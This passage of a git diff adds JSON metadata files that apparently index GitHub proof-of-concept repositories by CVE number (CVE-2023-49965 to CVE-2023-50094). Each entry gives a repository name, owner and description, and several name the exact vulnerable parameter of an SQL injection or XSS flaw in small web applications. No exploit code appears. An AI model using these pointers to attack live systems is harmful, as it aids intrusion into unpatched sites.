false, + "created_at": "2023-12-08T20:47:52Z", + "updated_at": "2024-08-12T20:33:05Z", + "pushed_at": "2023-12-09T10:54:03Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "bypass", + "cve", + "cve-2020-12873", + "cve-2023-49964", + "cves", + "remote-code-execution", + "server-side-template-injection" + ], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49965.json b/2023/CVE-2023-49965.json new file mode 100644 index 0000000000..bff7547bad --- /dev/null +++ b/2023/CVE-2023-49965.json @@ -0,0 +1,33 @@ +[ + { + "id": 826664850, + "name": "SpaceX-Starlink-Router-Gen-2-XSS", + "full_name": "yoshida-git-ai\/SpaceX-Starlink-Router-Gen-2-XSS", + "owner": { + "login": "yoshida-git-ai", + "id": 94094919, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94094919?v=4", + "html_url": "https:\/\/github.com\/yoshida-git-ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoshida-git-ai\/SpaceX-Starlink-Router-Gen-2-XSS", + "description": "CVE-2023-49965 | SpaceX \/ Starlink Router Gen 2 XSS ", + "fork": false, + "created_at": "2024-07-10T06:28:16Z", + "updated_at": "2024-07-10T06:28:16Z", + "pushed_at": "2024-04-10T16:39:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49968.json b/2023/CVE-2023-49968.json new file mode 100644 index 0000000000..ea5c864e5f --- /dev/null +++ b/2023/CVE-2023-49968.json @@ -0,0 +1,33 @@ +[ + { + "id": 733689714, + "name": "CVE-2023-49968", + "full_name": "geraldoalcantara\/CVE-2023-49968", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49968", + "description": "Customer Support System 1.0 - SQL Injection Vulnerability in manage_department.php via \"id\" URL Parameter", + "fork": false, + "created_at": "2023-12-19T22:45:22Z", + "updated_at": "2023-12-20T09:48:23Z", + "pushed_at": "2023-12-20T08:30:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49969.json b/2023/CVE-2023-49969.json new file mode 100644 index 0000000000..a464bf723e --- /dev/null +++ b/2023/CVE-2023-49969.json @@ -0,0 +1,33 @@ +[ + { + "id": 733693627, + "name": "CVE-2023-49969", + "full_name": "geraldoalcantara\/CVE-2023-49969", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49969", + "description": "Customer Support System 1.0 - SQL Injection Vulnerability in edit_customer via \"id\" URL Parameter", + "fork": false, + "created_at": "2023-12-19T23:02:09Z", + "updated_at": "2023-12-20T09:49:01Z", + "pushed_at": "2023-12-20T08:32:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49970.json b/2023/CVE-2023-49970.json new file mode 100644 index 0000000000..ee4881e33d --- /dev/null +++ b/2023/CVE-2023-49970.json @@ -0,0 +1,33 @@ +[ + { + "id": 733695939, + "name": "CVE-2023-49970", + "full_name": "geraldoalcantara\/CVE-2023-49970", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49970", + "description": "Customer Support System 1.0 - SQL Injection Vulnerability in the \"subject\" Parameter During \"save_ticket\" Operation", + "fork": false, + "created_at": "2023-12-19T23:12:29Z", + "updated_at": "2023-12-20T09:49:52Z", + "pushed_at": "2023-12-20T08:34:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49971.json b/2023/CVE-2023-49971.json new file mode 100644 index 0000000000..f5bbd97e36 --- /dev/null +++ b/2023/CVE-2023-49971.json @@ -0,0 +1,33 @@ +[ + { + "id": 733716638, + "name": "CVE-2023-49971", + "full_name": "geraldoalcantara\/CVE-2023-49971", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49971", + "description": "Customer Support System 1.0 - (XSS) Cross-Site Scripting Vulnerability in the \"firstname\" parameter at \"customer_list", + "fork": false, + "created_at": "2023-12-20T00:55:22Z", + "updated_at": "2023-12-20T09:50:27Z", + "pushed_at": "2023-12-20T08:42:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49973.json b/2023/CVE-2023-49973.json new file mode 100644 index 0000000000..9f0ccb05b4 --- /dev/null +++ b/2023/CVE-2023-49973.json @@ -0,0 +1,33 @@ +[ + { + "id": 733723468, + "name": "CVE-2023-49973", + "full_name": "geraldoalcantara\/CVE-2023-49973", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49973", + "description": "Customer Support System 1.0 - Cross-Site Scripting (XSS) Vulnerability in \"email\" field\/parameter on \"customer_list\" Page", + "fork": false, + "created_at": "2023-12-20T01:26:22Z", + "updated_at": "2023-12-20T09:51:00Z", + "pushed_at": "2023-12-20T08:48:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49974.json b/2023/CVE-2023-49974.json new file mode 100644 index 0000000000..b989723cf5 --- /dev/null +++ b/2023/CVE-2023-49974.json @@ -0,0 +1,33 @@ +[ + { + "id": 733724496, + "name": "CVE-2023-49974", + "full_name": "geraldoalcantara\/CVE-2023-49974", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49974", + "description": "Customer Support System 1.0 - Cross-Site Scripting (XSS) Vulnerability in \"contact\" field\/parameter on \"customer_list\" Page", + "fork": false, + "created_at": "2023-12-20T01:31:08Z", + "updated_at": "2023-12-20T09:51:39Z", + "pushed_at": "2023-12-20T01:34:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49976.json b/2023/CVE-2023-49976.json new file mode 100644 index 0000000000..ad18a40ebf --- /dev/null +++ b/2023/CVE-2023-49976.json @@ -0,0 +1,33 @@ +[ + { + "id": 724641524, + "name": "CVE-2023-49976", + "full_name": "geraldoalcantara\/CVE-2023-49976", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49976", + "description": " Customer Support System 1.0 is vulnerable to stored XSS. A XSS vulnerability exists in version 1 of the Customer Support System. A malicious actor can insert JavaScript code through the \"subject\" field when editing\/creating a ticket. ", + "fork": false, + "created_at": "2023-11-28T13:53:45Z", + "updated_at": "2023-12-20T09:52:28Z", + "pushed_at": "2023-12-20T01:05:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49977.json b/2023/CVE-2023-49977.json new file mode 100644 index 0000000000..21181816e4 --- /dev/null +++ b/2023/CVE-2023-49977.json @@ -0,0 +1,33 @@ +[ + { + "id": 733727150, + "name": "CVE-2023-49977", + "full_name": "geraldoalcantara\/CVE-2023-49977", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49977", + "description": "Customer Support System 1.0 - Cross-Site Scripting (XSS) Vulnerability in \"Address\" field\/parameter on \"customer_list\" Page", + "fork": false, + "created_at": "2023-12-20T01:43:06Z", + "updated_at": "2023-12-20T09:53:04Z", + "pushed_at": "2023-12-20T01:49:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49978.json b/2023/CVE-2023-49978.json new file mode 100644 index 0000000000..a2595b9f98 --- /dev/null +++ b/2023/CVE-2023-49978.json @@ -0,0 +1,33 @@ +[ + { + "id": 733728970, + "name": "CVE-2023-49978", + "full_name": "geraldoalcantara\/CVE-2023-49978", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49978", + "description": "Customer Support System 1.0 - Incorrect Access Control", + "fork": false, + "created_at": "2023-12-20T01:51:28Z", + "updated_at": "2023-12-20T09:53:46Z", + "pushed_at": "2023-12-20T02:04:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49979.json b/2023/CVE-2023-49979.json new file mode 100644 index 0000000000..0ccbe6fc74 --- /dev/null +++ b/2023/CVE-2023-49979.json @@ -0,0 +1,33 @@ +[ + { + "id": 733745008, + "name": "CVE-2023-49979", + "full_name": "geraldoalcantara\/CVE-2023-49979", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49979", + "description": "Best Student Management System v1.0 - Incorrect Access Control - Directory Listing", + "fork": false, + "created_at": "2023-12-20T03:01:53Z", + "updated_at": "2023-12-20T09:54:36Z", + "pushed_at": "2023-12-20T03:22:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49980.json b/2023/CVE-2023-49980.json new file mode 100644 index 0000000000..e40b7e4be6 --- /dev/null +++ b/2023/CVE-2023-49980.json @@ -0,0 +1,33 @@ +[ + { + "id": 724635472, + "name": "CVE-2023-49980", + "full_name": "geraldoalcantara\/CVE-2023-49980", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49980", + "description": "Best Student Result Management System 1.0 - Directory Listing CVE-2023-49980", + "fork": false, + "created_at": "2023-11-28T13:40:06Z", + "updated_at": "2023-12-20T09:55:11Z", + "pushed_at": "2023-12-19T20:12:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49981.json b/2023/CVE-2023-49981.json new file mode 100644 index 0000000000..dc8d13b16f --- /dev/null +++ b/2023/CVE-2023-49981.json @@ -0,0 +1,33 @@ +[ + { + "id": 733749059, + "name": "CVE-2023-49981", + "full_name": "geraldoalcantara\/CVE-2023-49981", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49981", + "description": "School Fees Management System v1.0 - Incorrect Access Control - Directory Listing", + "fork": false, + "created_at": "2023-12-20T03:19:09Z", + "updated_at": "2023-12-20T09:55:44Z", + "pushed_at": "2023-12-20T09:21:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49982.json b/2023/CVE-2023-49982.json new file mode 100644 index 0000000000..de1ab83df9 --- /dev/null +++ b/2023/CVE-2023-49982.json @@ -0,0 +1,33 @@ +[ + { + "id": 733754634, + "name": "CVE-2023-49982", + "full_name": "geraldoalcantara\/CVE-2023-49982", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49982", + "description": "School Fees Management System v1.0 - Incorrect Access Control - Privilege Escalation", + "fork": false, + "created_at": "2023-12-20T03:44:16Z", + "updated_at": "2023-12-20T09:56:25Z", + "pushed_at": "2023-12-20T03:45:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49983.json b/2023/CVE-2023-49983.json new file mode 100644 index 0000000000..84a59c2cdb --- /dev/null +++ b/2023/CVE-2023-49983.json @@ -0,0 +1,33 @@ +[ + { + "id": 733757280, + "name": "CVE-2023-49983", + "full_name": "geraldoalcantara\/CVE-2023-49983", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49983", + "description": "School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in \"name\" field\/parameter on \"\/management\/class\"", + "fork": false, + "created_at": "2023-12-20T03:56:16Z", + "updated_at": "2023-12-20T09:57:00Z", + "pushed_at": "2023-12-20T09:25:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49984.json b/2023/CVE-2023-49984.json new file mode 100644 index 0000000000..2e258f4a64 --- /dev/null +++ b/2023/CVE-2023-49984.json @@ -0,0 +1,33 @@ +[ + { + "id": 733759340, + "name": "CVE-2023-49984", + "full_name": "geraldoalcantara\/CVE-2023-49984", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49984", + "description": "School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in \"name\" field\/parameter on \"\/management\/settings\"", + "fork": false, + "created_at": "2023-12-20T04:06:00Z", + "updated_at": "2023-12-20T09:57:47Z", + "pushed_at": "2023-12-20T09:26:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49985.json b/2023/CVE-2023-49985.json new file mode 100644 index 0000000000..a7e13ad3c7 --- /dev/null +++ b/2023/CVE-2023-49985.json @@ -0,0 +1,33 @@ +[ + { + "id": 733760666, + "name": "CVE-2023-49985", + "full_name": "geraldoalcantara\/CVE-2023-49985", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49985", + "description": "School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in \"cname\" parameter on \"new_class\"", + "fork": false, + "created_at": "2023-12-20T04:12:02Z", + "updated_at": "2023-12-20T09:58:25Z", + "pushed_at": "2023-12-20T09:29:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49986.json b/2023/CVE-2023-49986.json new file mode 100644 index 0000000000..bd9bab1f67 --- /dev/null +++ b/2023/CVE-2023-49986.json @@ -0,0 +1,33 @@ +[ + { + "id": 733762762, + "name": "CVE-2023-49986", + "full_name": "geraldoalcantara\/CVE-2023-49986", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49986", + "description": "School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in \"name\" parameter on \"add_new_parent\"", + "fork": false, + "created_at": "2023-12-20T04:21:46Z", + "updated_at": "2023-12-20T09:59:09Z", + "pushed_at": "2023-12-20T04:28:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49987.json b/2023/CVE-2023-49987.json new file mode 100644 index 0000000000..bb60dc329c --- /dev/null +++ b/2023/CVE-2023-49987.json @@ -0,0 +1,33 @@ +[ + { + "id": 733764792, + "name": "CVE-2023-49987", + "full_name": "geraldoalcantara\/CVE-2023-49987", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49987", + "description": "School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in \"tname\" parameter on \"new_term\"", + "fork": false, + "created_at": "2023-12-20T04:30:49Z", + "updated_at": "2023-12-20T09:59:43Z", + "pushed_at": "2023-12-20T04:34:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49988.json b/2023/CVE-2023-49988.json new file mode 100644 index 0000000000..dcb2ba15f0 --- /dev/null +++ b/2023/CVE-2023-49988.json @@ -0,0 +1,33 @@ +[ + { + "id": 733766007, + "name": "CVE-2023-49988", + "full_name": "geraldoalcantara\/CVE-2023-49988", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49988", + "description": "Hotel Booking Management v1.0 - SQL Injection Vulnerability in the \"npss\" parameter at rooms.php", + "fork": false, + "created_at": "2023-12-20T04:36:35Z", + "updated_at": "2023-12-20T10:00:28Z", + "pushed_at": "2023-12-20T09:35:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49989.json b/2023/CVE-2023-49989.json new file mode 100644 index 0000000000..5b0837994c --- /dev/null +++ b/2023/CVE-2023-49989.json @@ -0,0 +1,33 @@ +[ + { + "id": 733768261, + "name": "CVE-2023-49989", + "full_name": "geraldoalcantara\/CVE-2023-49989", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49989", + "description": "Hotel Booking Management v1.0 - SQL Injection Vulnerability in the \"id\" parameter at update.php", + "fork": false, + "created_at": "2023-12-20T04:46:28Z", + "updated_at": "2023-12-20T10:01:07Z", + "pushed_at": "2023-12-20T09:37:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50029.json b/2023/CVE-2023-50029.json new file mode 100644 index 0000000000..c765829c60 --- /dev/null +++ b/2023/CVE-2023-50029.json @@ -0,0 +1,33 @@ +[ + { + "id": 819640713, + "name": "PHP-Injection-in-M4-PDF-Extensions", + "full_name": "absholi7ly\/PHP-Injection-in-M4-PDF-Extensions", + "owner": { + "login": "absholi7ly", + "id": 72062217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4", + "html_url": "https:\/\/github.com\/absholi7ly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/absholi7ly\/PHP-Injection-in-M4-PDF-Extensions", + "description": "CVE-2023-50029: PHP Injection Vulnerability in M4 PDF Extensions Module", + "fork": false, + "created_at": "2024-06-24T23:26:05Z", + "updated_at": "2024-06-24T23:31:50Z", + "pushed_at": "2024-06-24T23:31:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50070.json b/2023/CVE-2023-50070.json new file mode 100644 index 0000000000..0f740565d5 --- /dev/null +++ b/2023/CVE-2023-50070.json @@ -0,0 +1,33 @@ +[ + { + "id": 732171989, + "name": "CVE-2023-50070", + "full_name": "geraldoalcantara\/CVE-2023-50070", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-50070", + "description": "Multiple SQL injection vulnerabilities in \/customer_support\/ajax.php?action=save_ticket in Customer Support System 1.0 allow authenticated attackers to execute arbitrary SQL commands via department_id, customer_id and subject.", + "fork": false, + "created_at": "2023-12-15T20:37:39Z", + "updated_at": "2024-02-16T12:23:24Z", + "pushed_at": "2023-12-29T23:05:21Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50071.json b/2023/CVE-2023-50071.json new file mode 100644 index 0000000000..8c76864f12 --- /dev/null +++ b/2023/CVE-2023-50071.json @@ -0,0 +1,33 @@ +[ + { + "id": 732511226, + "name": "CVE-2023-50071", + "full_name": "geraldoalcantara\/CVE-2023-50071", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-50071", + "description": "Multiple SQL injection vulnerabilities in \/customer_support\/ajax.php?action=save_department in Customer Support System 1.0 allow authenticated attackers to execute arbitrary SQL commands via id or name.", + "fork": false, + "created_at": "2023-12-16T23:06:25Z", + "updated_at": "2024-02-26T02:00:12Z", + "pushed_at": "2024-03-01T11:57:29Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50072.json b/2023/CVE-2023-50072.json new file mode 100644 index 0000000000..36318215b2 --- /dev/null +++ b/2023/CVE-2023-50072.json @@ -0,0 +1,33 @@ +[ + { + "id": 733963314, + "name": "CVE-2023-50072", + "full_name": "ahrixia\/CVE-2023-50072", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-50072", + "description": "A stored cross-site scripting (XSS) vulnerability exists in OpenKM version 7.1.40.", + "fork": false, + "created_at": "2023-12-20T14:36:01Z", + "updated_at": "2024-11-07T14:34:10Z", + "pushed_at": "2024-01-25T07:14:57Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50094.json b/2023/CVE-2023-50094.json new file mode 100644 index 0000000000..88e71a9ae3 --- /dev/null +++ b/2023/CVE-2023-50094.json @@ -0,0 +1,33 @@ +[ + { + "id": 893203261, + "name": "CVE-2023-50094_POC", + "full_name": "Zierax\/CVE-2023-50094_POC", + "owner": { + "login": "Zierax", + "id": 153237520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153237520?v=4", + "html_url": "https:\/\/github.com\/Zierax", + 